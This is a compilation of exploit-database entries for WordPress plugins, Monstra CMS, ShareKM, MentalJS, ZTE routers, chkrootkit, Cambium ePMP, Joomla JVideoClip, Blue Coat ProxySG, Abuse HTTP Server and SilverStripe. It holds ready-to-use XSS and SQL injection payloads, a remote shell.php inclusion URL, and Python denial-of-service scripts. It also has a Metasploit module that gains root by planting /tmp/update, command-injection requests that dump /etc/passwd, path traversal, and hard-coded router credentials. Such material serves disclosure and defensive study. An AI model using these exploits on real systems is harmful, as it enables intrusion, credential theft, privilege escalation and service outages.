source: https://www.securityfocus.com/bid/62493/info The RokIntroScroller plugin for WordPress is prone to multiple security vulnerabilities, including: 1. An arbitrary file-upload vulnerability 2. A cross-site scripting vulnerability 3. An information-disclosure vulnerability 4. A denial-of-service vulnerability Attackers can exploit these issues to obtain sensitive information, upload arbitrary files, perform a denial-of-service attack, execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. RokIntroScroller 1.8 is vulnerable; other versions may also be affected. http://www.example.com/wp-content/plugins/wp_rokintroscroller/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg http://www.example.com/wp-content/plugins/wp_rokintroscroller/thumb.php?src=http://www.example2.com/page.png&h=1&w=1111111 http://www.example.com/wp-content/plugins/wp_rokintroscroller/thumb.php?src=http://www.example2.com/big_file&h=1&w=1 http://www.example.com/wp-content/plugins/wp_rokintroscroller/thumb.php?src=http://www.example2.com/shell.php http://www.example.com/wp-content/plugins/wp_rokintroscroller/rokintroscroller.php
-
WordPress Plugin RokMicroNews - 'thumb.php' Multiple Vulnerabilities
source: https://www.securityfocus.com/bid/62513/info The RokMicroNews plugin for WordPress is prone to multiple security vulnerabilities, including: 1. An information-disclosure vulnerability 2. A cross-site scripting vulnerability 3. An arbitrary file-upload vulnerability 4. A denial-of-service vulnerability Attackers can exploit these issues to obtain sensitive information, upload arbitrary files, perform a denial-of-service attack, execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. http://www.example.com/wp-content/plugins/wp_rokmicronews/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg http://www.example.com/wp-content/plugins/wp_rokmicronews/thumb.php?src=http:// http://www.example.com/wp-content/plugins/wp_rokmicronews/thumb.php?src=http://www.example1.com/big_file&h=1&w=1 http://www.example.com/wp-content/plugins/wp_rokmicronews/thumb.php?src=http://www.example2.com/shell.php
-
Monstra CMS 1.2.0 - 'login' SQL Injection
source: https://www.securityfocus.com/bid/62572/info Monstra CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Monstra 1.2.0 is vulnerable; other versions may also be affected. The request below injects into the login parameter of the admin login form. Note that the injected comparison 85 = '83 evaluates to false, so this single request is a boolean probe rather than an authentication bypass; to confirm the injection, send it again with an equivalent true condition (for example 85 = '85) and compare the two responses. POST /admin/ HTTP/1.1 Content-Length: 72 Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Cookie: PHPSESSID=f6bd4782f77e4027d3975d32c414a36d Host: XXX Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept: */* login=-1' or 85 = '83&login_submit=Enter&password=lincoln.dll
-
ShareKM - Remote Denial of Service
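#!/usr/bin/python
# source: https://www.securityfocus.com/bid/62586/info
#
# ShareKM is prone to a denial-of-service vulnerability. An attacker can exploit
# this issue to cause the server to crash or disconnect, denying service to
# legitimate users.
#
# ShareKM 1.0.19 is vulnerable; prior versions may also be affected.
#
# PoC: open a TCP connection to the ShareKM port and send 50,000 bytes of 0x41.
# Crash-only; nothing about control of execution is shown.
import socket

TCP_IP = '192.168.1.100'
TCP_PORT = 55554
BUFFER_SIZE = 1024
# bytes rather than str so the script also runs under Python 3 (socket.send
# rejects str there); identical on Python 2.
MESSAGE = b"\x41" * 50000


def send_crash(host=TCP_IP, port=TCP_PORT, message=MESSAGE):
    """Connect to host:port and deliver the oversized message.

    sendall() is used instead of send() so the whole payload is written even
    when the kernel accepts it in several pieces; the socket is always closed.
    """
    s = socket.create_connection((host, port))
    try:
        s.sendall(message)
    finally:
        s.close()


if __name__ == "__main__":
    send_crash()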
-
MentalJS - Sandbox Security Bypass
source: https://www.securityfocus.com/bid/62581/info MentalJS is prone to a security-bypass vulnerability. An attacker can exploit this issue to bypass sandbox security restrictions and perform unauthorized actions; this may aid in launching further attacks. http://www.example.com/demo/demo-deny-noescape.html?test=%3Cscript%3Edocument.body.innerHTML=%22%3Cform+onmouseover=javascript:alert(0);%3E%3Cinput+name=attributes%3E%22;%3C/script%3E
-
ZTE ZXHN H108N R1A / ZXV10 W300 Routers - Multiple Vulnerabilities
# Exploit Title: [ZTE ZXHN H108N R1A + ZXV10 W300 routers - multiple vulnerabilities] # Discovered by: Karn Ganeshen # CERT VU# 391604 # Vendor Homepage: [www.zte.com.cn] # Versions Reported # ZTE ZXHN H108N R1A - Software version ZTE.bhs.ZXHNH108NR1A # ZTE ZXV10 W300 - Software version - w300v1.0.0f_ER1_PE Overview ZTE ZXHN H108N R1A router, version ZTE.bhs.ZXHNH108NR1A.h_PE, and ZXV10 W300 router, version W300V1.0.0f_ER1_PE, contain multiple vulnerabilities. *CVE-ID*: CVE-2015-7248 CVE-2015-7249 CVE-2015-7250 CVE-2015-7251 CVE-2015-7252 *Note*: Large deployment size, primarily in Peru, used by TdP. Description *CWE-200* <https://cwe.mitre.org/data/definitions/200.html>*: Information Exposure* - CVE-2015-7248 Multiple information exposure vulnerabilities enable an attacker to obtain credentials and other sensitive details about the ZXHN H108N R1A. A. User names and password hashes can be viewed in the page source of http://<IP>/cgi-bin/webproc PoC: Login Page source contents: ...snip.... //get user info var G_UserInfo = new Array(); var m = 0; G_UserInfo[m] = new Array(); G_UserInfo[m][0] = "admin"; //UserName G_UserInfo[m][1] = "$1$Tsnipped/; //Password Hash seen here G_UserInfo[m][2] = "1"; //Level G_UserInfo[m][3] = "1"; //Index m++; G_UserInfo[m] = new Array(); G_UserInfo[m][0] = "user"; //UserName G_UserInfo[m][1] = "$1$Tsnipped"; //Password Hash seen here G_UserInfo[m][2] = "2"; //Level G_UserInfo[m][3] = "2"; //Index m++; G_UserInfo[m] = new Array(); G_UserInfo[m][0] = "support"; //UserName G_UserInfo[m][1] = "$1$Tsnipped"; //Password Hash seen here G_UserInfo[m][2] = "2"; //Level G_UserInfo[m][3] = "3"; //Index m++; ...snip... B. The configuration file of the device contains usernames, passwords, keys, and other values in plain text, which can be used by a user with lower privileges to gain admin account access. This issue also affects ZTE ZXV10 W300 models, version W300V1.0.0f_ER1_PE. 
*CWE-285* <https://cwe.mitre.org/data/definitions/285.html>*: Improper Authorization* - CVE-2015-7249 By default, only admin may authenticate directly with the web administration pages in the ZXHN H108N R1A. By manipulating parameters in client-side requests, an attacker may authenticate as another existing account, such as user or support, and may be able to perform actions otherwise not allowed. PoC 1: 1. Login page user drop-down option shows only admin only. 2. Use an intercepting proxy / Tamper Data - and intercept the Login submit request. 3. Change the username admin to user / support and continue Login. 4. Application permits other users to log in to mgmt portal. PoC 2: After logging in as support, some functional options are visibly restricted. Certain actions can still be performed by calling the url directly. Application does not perform proper AuthZ checks. Following poc is a change password link. It is accessible directly, though it (correctly) is restricted to changing normal user (non-admin) password only. http:// <IP>/cgi-bin/webproc?getpage=html/index.html&var:menu=maintenance&var:page=accessctrl&var:subpage=accountpsd Other functions / pages may also be accessible to non-privileged users. *CWE-22* <http://cwe.mitre.org/data/definitions/22.html>*: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') *- CVE-2015-7250 The webproc cgi module of the ZXHN H108N R1A accepts a getpage parameter which takes an unrestricted file path as input, allowing an attacker to read arbitrary files on the system. Arbitrary files can be read off of the device. No authentication is required to exploit this vulnerability. 
PoC HTTP POST request (note: in this request the traversal payload is carried by the errorpage parameter, while getpage keeps its normal value html/index.html; the description above names getpage, so errorpage is the parameter actually demonstrated here. Hyphens dropped from header names and the obj-action field by the original mail formatting have been restored.) POST /cgi-bin/webproc HTTP/1.1 Host: IP User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://IP/cgi-bin/webproc Cookie: sessionid=7ce7bd4a; language=en_us; sys_UserName=admin Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 177 getpage=html%2Findex.html&errorpage=%2fetc%2fpasswd&var%3Amenu=setup&var%3Apage=wancfg&obj-action=auth&%3Ausername=admin&%3Apassword=admin&%3Aaction=login&%3Asessionid=7ce7bd4a HTTP Response HTTP/1.0 200 OK Content-type: text/html Pragma: no-cache Cache-Control: no-cache set-cookie: sessionid=7ce7bd4a; expires=Fri, 31-Dec-9999 23:59:59 GMT;path=/ #root:x:0:0:root:/root:/bin/bash root:x:0:0:root:/root:/bin/sh #tw:x:504:504::/home/tw:/bin/bash #tw:x:504:504::/home/tw:/bin/msh *CWE-798* <http://cwe.mitre.org/data/definitions/798.html>*: Use of Hard-coded Credentials* - CVE-2015-7251 In the ZXHN H108N R1A, the Telnet service, when enabled, is accessible using the hard-coded credentials 'root' for both the username and password. *CWE-79* <https://cwe.mitre.org/data/definitions/79.html>*: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') *- CVE-2015-7252 In the ZXHN H108N R1A, the errorpage parameter of the webproc cgi module is vulnerable to reflected cross-site scripting [pre-authentication]. 
PoC (header names restored; the reflected value is the errorpage parameter) POST /cgi-bin/webproc HTTP/1.1 Host: IP User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://IP/cgi-bin/webproc Cookie: sessionid=7ce7bd4a; language=en_us; sys_UserName=admin Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 177 getpage=html%2Findex.html&errorpage=html%2fmain.html<script>alert(1)</script>&var%3Amenu=setup&var%3Apage=wancfg&obj-action=auth&%3Ausername=admin&%3Apassword=admin&%3Aaction=login&%3Asessionid=7ce7bd4a +++++ -- Best Regards, Karn Ganeshen
-
ZTE ADSL ZXV10 W300 Modems - Multiple Vulnerabilities
# Exploit Title: [ZTE ADSL ZXV10 W300 modems - Multiple vulnerabilities] # Discovered by: Karn Ganeshen # Vendor Homepage: [www.zte.com.cn] # Versions Reported: [W300V2.1.0f_ER7_PE_O57 and W300V2.1.0h_ER7_PE_O57] *CVE-ID*: CVE-2015-7257 CVE-2015-7258 CVE-2015-7259 *Note*: Large deployment size, primarily in Peru, used by TdP. 1 *Insufficient authorization controls* *CVE-ID*: CVE-2015-7257 Observed in Password Change functionality. Other functions may be vulnerable as well. *Expected behavior:* Only administrative 'admin' user should be able to change password for all the device users. 'support' is a diagnostic user with restricted privileges. It can change only its own password. *Vulnerability:* Any non-admin user can change 'admin' password. *Steps to reproduce:* a. Login as user 'support' password XXX b. Access Password Change page - http://<IP>/password.htm c. Submit request d. Intercept and Tamper the parameter username change from 'support' to 'admin' e. Enter the new password > old password is not requested > Submit > Login as admin -> Pwn! 2 *Sensitive information disclosure - clear-text passwords* *CVE-ID*: CVE-2015-7258 Displaying user information over Telnet connection, shows all valid users and their passwords in clear-text. *Steps to reproduce:* $ telnet <IP> Trying <IP>... Connected to <IP>. Escape character is '^]'. User Access Verification Username: admin Password: < admin/XXX1 $sh ADSL#login show <-- shows user information Username Password Priority admin password1 2 support password2 0 admin password3 1 3 *(Potential) Backdoor account feature - **insecure account management* *CVE-ID*: CVE-2015-7259 Same login account can exist on the device, multiple times, each with different priority#. It is possible to log in to device with either of the username/password combination. It is considered as a (redundant) login support *feature*. *Steps to reproduce:* $ telnet <IP> Trying <IP>... Connected to <IP>. Escape character is '^]'. 
User Access Verification User Access Verification Username: admin Password: <-- admin/password3 $sh ADSL#login show Username Password Priority admin password1 2 support password2 0 admin password3 1 +++++ -- Best Regards, Karn Ganeshen
-
Chkrootkit - Local Privilege Escalation (Metasploit)
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Local privilege escalation against chkrootkit < 0.50 (CVE-2014-0476).
#
# Vulnerable chkrootkit versions execute /tmp/update as root when their
# periodic scan runs, so planting an executable there yields a root shell
# the next time cron fires chkrootkit. The module itself triggers nothing;
# it drops the file and then waits for the scheduled scan.
class Metasploit4 < Msf::Exploit::Local
  # Manual rather than Excellent: the shell only lands once cron runs
  # chkrootkit, which with the default schedule can take up to a day.
  Rank = ManualRanking

  include Msf::Post::File
  include Msf::Exploit::FileDropper

  # Path that chkrootkit < 0.50 executes as root during a scan.
  DROPPER_PATH = '/tmp/update'

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Chkrootkit Local Privilege Escalation',
      'Description'    => %q{
        Chkrootkit before 0.50 will run any executable file named
        /tmp/update as root, allowing a trivial privsec. WfsDelay is set to
        24h, since this is how often a chkrootkit scan is scheduled by
        default.
      },
      'Author'         => [
        'Thomas Stangner',          # Original exploit
        'Julien "jvoisin" Voisin'   # Metasploit module
      ],
      'References'     => [
        ['CVE', '2014-0476'],
        ['OSVDB', '107710'],
        ['EDB', '33899'],
        ['BID', '67813'],
        ['CWE', '20'],
        ['URL', 'http://seclists.org/oss-sec/2014/q2/430']
      ],
      'DisclosureDate' => 'Jun 04 2014',
      'License'        => MSF_LICENSE,
      'Platform'       => 'unix',
      'Arch'           => ARCH_CMD,
      'SessionTypes'   => ['shell', 'meterpreter'],
      'Privileged'     => true,
      'Stance'         => Msf::Exploit::Stance::Passive,
      'Targets'        => [['Automatic', {}]],
      'DefaultTarget'  => 0,
      # Wait a full day for a session: the default cron schedule for chkrootkit.
      'DefaultOptions' => { 'WfsDelay' => 60 * 60 * 24 }
    ))

    register_options([
      OptString.new('CHKROOTKIT', [true, 'Path to chkrootkit', '/usr/sbin/chkrootkit'])
    ])
  end

  # Returns Appears when `chkrootkit -V` prints a 0.1x-0.4x version string,
  # Safe otherwise (a missing or unreadable binary produces no match and is
  # therefore reported as Safe).
  def check
    banner = cmd_exec("#{datastore['CHKROOTKIT']} -V 2>&1")
    return Exploit::CheckCode::Appears if banner =~ /chkrootkit version 0\.[1-4]/
    Exploit::CheckCode::Safe
  end

  # Plants a shell wrapper around the payload at /tmp/update, marks it for
  # cleanup, and returns; the framework then waits (WfsDelay) for the
  # scheduled chkrootkit run to execute it as root.
  def exploit
    print_warning('Rooting depends on the crontab (this could take a while)')
    # The payload is backgrounded so chkrootkit's own run is not blocked by it.
    wrapper = "#!/bin/sh\n(#{payload.encoded}) &\n"
    write_file(DROPPER_PATH, wrapper)
    cmd_exec("chmod +x #{DROPPER_PATH}")
    register_file_for_cleanup(DROPPER_PATH)
    print_status("Payload written to #{DROPPER_PATH}")
    print_status('Waiting for chkrootkit to run via cron...')
  end
end
-
Cambium ePMP 1000 - Multiple Vulnerabilities
*July 14, 2015: *First contacted Cambium *July 14, 2015: *Initial vendor response *July 16, 2015: *Vuln Details reported to Cambium *July 31, 2015:* Followup on advisory and fix timelines *August 03, 2015: *Vendor gives mid-Aug as fix (v2.5) release timeline. Ceases communication. *Nov 19, 2015: *Releasing vulnerability details & poc *Versions affected*: < v2.5 ..... *CVE-IDs* - To be assigned. ..... *Background * http://www.cambiumnetworks.com/products/access/epmp-1000/ ePMP™ 1000 Wireless service providers and enterprises need reliable, high-quality broadband connectivity that can be rapidly deployed and expanded. The ePMP platform provides stable coverage across large service areas and enhances your existing infrastructure. *Deployed by:* ION Telecom Kayse Wireless Vanilla Telecom Traeger Park EszakNet Edera Videon COMeSER Seattle, WA Budapest Video Surveillance Desktop Silo Wireless Rocket Broadband Snavely Forest Products KRK Sistemi KAJA Komputer Root Media *Vulnerability Details* *From Cambium Networks ePMP 1000 user / configuration guide: * ePMP 1000 has four (4) users - - ADMINISTRATOR, who has full read and write permissions. - INSTALLER, who has permissions to read and write parameters applicable to unit installation and monitoring. - HOME, who has permissions only to access pertinent information for support purposes - READONLY, who only has permissions to view the Monitor page. ..... 1. *OS Command Injection * 'admin' and 'installer' users have access to perform Ping and Traceroute functions via GUI. No other user has this access. Ping function accepts destination IP address value via 'ping_ip parameter and uses three (3) other parameters - packets_num, buf_size and ttl, to perform Ping. Traceroute function accepts destination IP address via 'traceroute_ip' parameter. The application does not perform strict input validation for all these parameters - ping_ip', packets_num, buf_size and ttl for Ping function; and traceroute_ip for Traceroute function. 
This allows an authenticated user - 'admin' or non-admin, low-privileged 'installer' & ‘home’ users - to be able to inject arbitrary system commands that gets executed by the host. ..... *PING PoC * ..... HTTP Request ..... POST /cgi-bin/luci/;stok=<stok_value>/admin/ping HTTP/1.1 Host: <IP_address> User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: http://<IP_address>/ Cookie: sysauth=<sysauth_value>; globalParams=%7B%22dashboard%22%3A%7B%22refresh_rate%22%3A%225%22%7D%2C%22installer%22%3A%7B%22refresh_rate%22%3A%225%22%7D%7D; userType=Installer; usernameType=installer; stok=<stok_value> DNT: 1 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache ping_ip=8.8.8.8|cat%20/etc/passwd%20||&packets_num=1&buf_size=1&ttl=1&debug=0 [ *or* ping_ip=8.8.8.8&packets_num=1|cat%20/etc/passwd%20||&buf_size=1&ttl=1&debug=0 *or* ping_ip=8.8.8.8&packets_num=1&buf_size=1|cat%20/etc/passwd%20||&ttl=1&debug=0 *or* ping_ip=8.8.8.8&packets_num=1&buf_size=1&ttl=1|cat%20/etc/passwd%20||&debug=0 ] ..... HTTP Response ..... HTTP/1.1 200 OK Cache-Control: no-store, no-cache, max-age=0, must-revalidate, post-check=0, pre-check=0 Cache-Control: no-cache Status: 200 OK Content-Type: text/plain Expires: 0 Date: Sun, 18 Jan 1970 14:45:37 GMT Server: Cambium HTTP Server daemon:*:1:1:daemon:/var:/bin/false ftp:*:55:55:ftp:/home/ftp:/bin/false network:*:101:101:network:/var:/bin/false admin:<password_hash>:1000:4:admin:/tmp:/usr/bin/clish installer:<password_hash>:2000:100:installer:/tmp:/bin/false home:<password_hash>:3000:100:home:/tmp:/bin/false readonly:<password_hash>:4000:100:readonly:/tmp:/bin/false dashboard:<password_hash>:5000:100:dashboard:/tmp:/bin/false nobody:*:65534:65534:nobody:/var:/bin/false root:<password_hash>:0:0:root:/root:/bin/ash ..... 
*traceroute - PoC * ..... HTTP Request ..... POST /cgi-bin/luci/;stok=<stok_value>/admin/traceroute HTTP/1.1 Host: <IP_address> User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: http://<IP_address>/ Cookie: sysauth=<sysauth_value>; globalParams=%7B%22dashboard%22%3A%7B%22refresh_rate%22%3A%225%22%7D%2C%22installer%22%3A%7B%22refresh_rate%22%3A%225%22%7D%7D; userType=Installer; usernameType=installer; stok=<stok_value> DNT: 1 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache traceroute_ip=8.8.8.8|cat%20/etc/passwd%20||&fragm=0&trace_method=icmp_echo&display_ttl=0&verbose=0&debug=0 ..... HTTP Response ..... HTTP/1.1 200 OK Cache-Control: no-store, no-cache, max-age=0, must-revalidate, post-check=0, pre-check=0 Cache-Control: no-cache Status: 200 OK Content-Type: text/plain Expires: 0 Date: Sun, 18 Jan 1970 16:09:26 GMT Server: Cambium HTTP Server daemon:*:1:1:daemon:/var:/bin/false ftp:*:55:55:ftp:/home/ftp:/bin/false network:*:101:101:network:/var:/bin/false admin:<password_hash>:1000:4:admin:/tmp:/usr/bin/clish installer:<password_hash>:2000:100:installer:/tmp:/bin/false home:<password_hash>:3000:100:home:/tmp:/bin/false readonly:<password_hash>:4000:100:readonly:/tmp:/bin/false dashboard:<password_hash>:5000:100:dashboard:/tmp:/bin/false nobody:*:65534:65534:nobody:/var:/bin/false root:<password_hash>:0:0:root:/root:/bin/ash ..... 2. *Weak Authorization Controls + privilege escalation* 'home' and 'readonly' users do not have access to Ping and Traceroute functions via management portal. However, the application lacks strict authorization controls, and we can still perform both these functions by sending corresponding HTTP(S) requests directly, when logged in as low-privileged, 'home' user. 
When we combine this flaw with above described OS Command Injection affecting ping and traceroute, it is possible for non-admin, low-privileged, ‘home’ user to execute system level commands via 'ping' and 'traceroute' functions and dump password hashes easily and / or perform any system level functions. *Note*: ‘readonly’ user cannot perform this. Only ‘home’ user can exploit these. ..... *Steps to attack - * a login as home user b craft & send HTTP request for ping and traceroute functions ..... Login - HTTP Request .. POST /cgi-bin/luci HTTP/1.1 Host: <IP_address> User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: http://<IP_address>/ Cookie: sysauth=<sysauth_value>; globalParams=%7B%22dashboard%22%3A%7B%22refresh_rate%22%3A%225%22%7D%2C%22installer%22%3A%7B%22refresh_rate%22%3A%225%22%7D%7D DNT: 1 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache username=home&password=<password> ..... Login - HTTP Response .. HTTP/1.1 200 OK Cache-Control: no-store, no-cache, max-age=0, must-revalidate, post-check=0, pre-check=0 Cache-Control: no-cache Status: 200 OK Set-Cookie: sysauth=<home-sysauth_value>; path=/cgi-bin/luci/;stok=<home-stok-value> Content-Type: application/json Expires: 0 Date: Sun, 18 Jan 1970 16:40:50 GMT Server: Cambium HTTP Server { "stok": <home-stok_value>", "certif_dir": "/tmp/new_certificates/", "status_url": "/cgi-bin/luci/;stok=<home-stok_value>/admin/status } .. *Sending HTTP request for Ping function * ..... HTTP Request ..... 
POST /cgi-bin/luci/;stok=<home-stok_value>/admin/ping HTTP/1.1 Host: <IP_address> User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: http://<IP_address>/ Cookie: sysauth=<home-sysauth_value>; globalParams=%7B%22dashboard%22%3A%7B%22refresh_rate%22%3A%225%22%7D%2C%22installer%22%3A%7B%22refresh_rate%22%3A%225%22%7D%7D; userType=Home User; usernameType=home; stok=<home-stok_value> DNT: 1 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache ping_ip=8.8.8.8|cat%20/etc/passwd%20||&packets_num=1&buf_size=1&ttl=1&debug=0 ..... HTTP Response ..... HTTP/1.1 200 OK Cache-Control: no-store, no-cache, max-age=0, must-revalidate, post-check=0, pre-check=0 Cache-Control: no-cache Status: 200 OK Content-Type: text/plain Expires: 0 Date: Sun, 18 Jan 1970 14:45:37 GMT Server: Cambium HTTP Server daemon:*:1:1:daemon:/var:/bin/false ftp:*:55:55:ftp:/home/ftp:/bin/false network:*:101:101:network:/var:/bin/false admin:<password_hash>:1000:4:admin:/tmp:/usr/bin/clish installer:<password_hash>:2000:100:installer:/tmp:/bin/false home:<password_hash>:3000:100:home:/tmp:/bin/false readonly:<password_hash>:4000:100:readonly:/tmp:/bin/false dashboard:<password_hash>:5000:100:dashboard:/tmp:/bin/false nobody:*:65534:65534:nobody:/var:/bin/false root:<password_hash>:0:0:root:/root:/bin/ash .. Similarly, Traceroute function can be exploited. ...................................................................................................................................................... 3. *Weak Authorization Controls + Information Disclosure* In addition to 'admin', only 'installer' user has the option to access device configuration. ‘home’ user does not have GUI option and should not be able to access / download device configuration. 
However, the application lacks strict authorization measures and the low-privileged 'home' user can gain unauthorized access to the device configuration simply by requesting it. *Configuration backup export* can be performed by directly accessing the following url: *http://<IP_address>/cgi-bin/luci/;stok=<homeuser-stok_value>/admin/config_export?opts=json * Upon a successful config export, full device configuration with clear-text passwords, usernames, keys, IP addresses, statistics, logs etc is downloaded. HTTP/1.1 200 OK Cache-Control: no-store, no-cache, max-age=0, must-revalidate, post-check=0, pre-check=0 Cache-Control: no-cache Status: 200 OK Content-Type: application/json Content-Disposition: attachment; filename=<filename>.json Expires: 0 Date: Sun, 18 Jan 1970 16:50:21 GMT Server: Cambium HTTP Server { "template_props": { "templateName":"", "templateDescription":"", "device_type":"", … <output - snipped> … } ..... Best Regards, Karn Ganeshen -- Best Regards, Karn Ganeshen
-
Joomla! Component JVideoClip 1.5.1 - 'uid' SQL Injection
source: https://www.securityfocus.com/bid/62610/info The JVideoClip component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data (the 'uid' parameter of the search view, as shown in the URL below) before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. JVideoClip 1.5.1 is vulnerable; other versions may also be affected. http://www.example.com/index.php?option=com_jvideoclip&view=search&type=user&uid=[SQLi]&Itemid=6
-
Blue Coat ProxySG 5.x and Security Gateway OS - Denial of Service
source: https://www.securityfocus.com/bid/62647/info Blue Coat ProxySG and Security Gateway OS are prone to a denial-of-service vulnerability. Successful exploits may allow an attacker to consume excessive resources, denying service to legitimate users. The proof of concept referenced below is the generic THC-SSL-DOS tool archive (thc-ssl-dos-1.4.tar.gz) rather than a device-specific exploit: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/thc-ssl-dos-1.4.tar.gz
-
Abuse HTTP Server - Remote Denial of Service
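'''
source: https://www.securityfocus.com/bid/62723/info

Abuse HTTP Server is prone to a remote denial-of-service vulnerability.

Attackers can exploit this issue to cause denial-of-service conditions.

Abuse HTTP Server version 2.08 is vulnerable; other versions may also be affected.
'''
#!/usr/bin/python
import socket
import os
import sys

# Default target, kept from the original PoC. Override on the command line:
#   python <script> <host> [port]
DEFAULT_HOST = "192.168.1.101"
DEFAULT_PORT = 80

# Length of the oversized Host header value used by the original PoC.
CRASH_LENGTH = 504


def build_request(crash_length=CRASH_LENGTH):
    """Return the malformed HTTP/1.1 request (as a str) that triggers the crash.

    crash_length: number of '0' characters placed in the Host header value.
    """
    crash = "0" * crash_length
    request = "GET / HTTP/1.1\r\n"
    request += "Host: " + crash + "\r\n"
    request += "Content-Type: application/x-www-form-urlencoded\r\n"
    request += "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1\r\n"
    # Preserved byte-for-byte from the original PoC, including the space
    # before the colon; whether that malformed spacing matters for the
    # crash is not established here.
    request += "Content-Length : 1048580\r\n\r\n"
    return request


def send_payload(host, port, request):
    """Connect to host:port, send the whole request, and always close the socket.

    Raises socket.error (e.g. connection refused or timeout) to the caller.
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        # Bounded wait so a silent target does not hang the script forever.
        sock.settimeout(10)
        sock.connect((host, port))
        # sendall() instead of send(): send() may transmit only part of the buffer.
        sock.sendall(request.encode("ascii"))
    finally:
        sock.close()


def main(argv):
    """Parse optional host/port from argv and fire the request at the target."""
    host = argv[1] if len(argv) > 1 else DEFAULT_HOST
    port = int(argv[2]) if len(argv) > 2 else DEFAULT_PORT
    print("[*] Exploit c0ded by Zee Eichel - zee[at]cr0security.com")
    print("[*] Change some option in code with your self")
    print("[*] Connect to host and send payload")
    send_payload(host, port, build_request())
    print("[*] Server Disconected")


if __name__ == "__main__":
    main(sys.argv)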
-
SilverStripe CMS - Multiple HTML Injection Vulnerabilities
source: https://www.securityfocus.com/bid/62782/info SilverStripe is prone to multiple HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input. Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and control how the site is rendered to the user; other attacks are also possible. SilverStripe 3.0.5 is vulnerable; other versions may also be affected. Proof of Concept: ================= 1.1 The first persistent input validation web vulnerability can be exploited by remote attackers with low privileged application user accounts and low required user interaction. For demonstration or reproduce ... PoC: Groups & Rollen (Roles) - Print <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>SilverStripe - Sicherheit</title> <link rel="stylesheet" type="text/css" href="/framework/css/GridField_print.css?m=1346228458"> </head> <body onload="window.print();"> <h3>SilverStripe - Sicherheit</h3> <table> <thead> <tr><th>Vorname</th><th>Nachname</th><th>E-Mail</th></tr> </thead> <tbody> </tbody> </table> <p> Gedruckt am 11:44pm, 22/09/2013 <br> Gedruckt von a%20>"<iframe src="a" onload="alert("BKM")<" a%20="" a%20<="">>"<iframe src=a onload=alert("BKM")< </p> </body> </html> </iframe></p></body></html> POST http://www.example.com/admin/security/EditForm/field/Groups/item/new/ItemEditForm Load Flags[LOAD_BYPASS_CACHE LOAD_BACKGROUND ] Content Size[20] Mime Type[text/html] Request Headers: Host[www.example.com] User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0] Accept[*/*] Accept-Language[en-US,en;q=0.5] Accept-Encoding[gzip, deflate] DNT[1] Content-Type[application/x-www-form-urlencoded; charset=UTF-8] X-Pjax[CurrentForm,Breadcrumbs] X-Requested-With[XMLHttpRequest] Referer[http://www.example.com/admin/security/EditForm/field/Groups/item/new] Content-Length[336] 
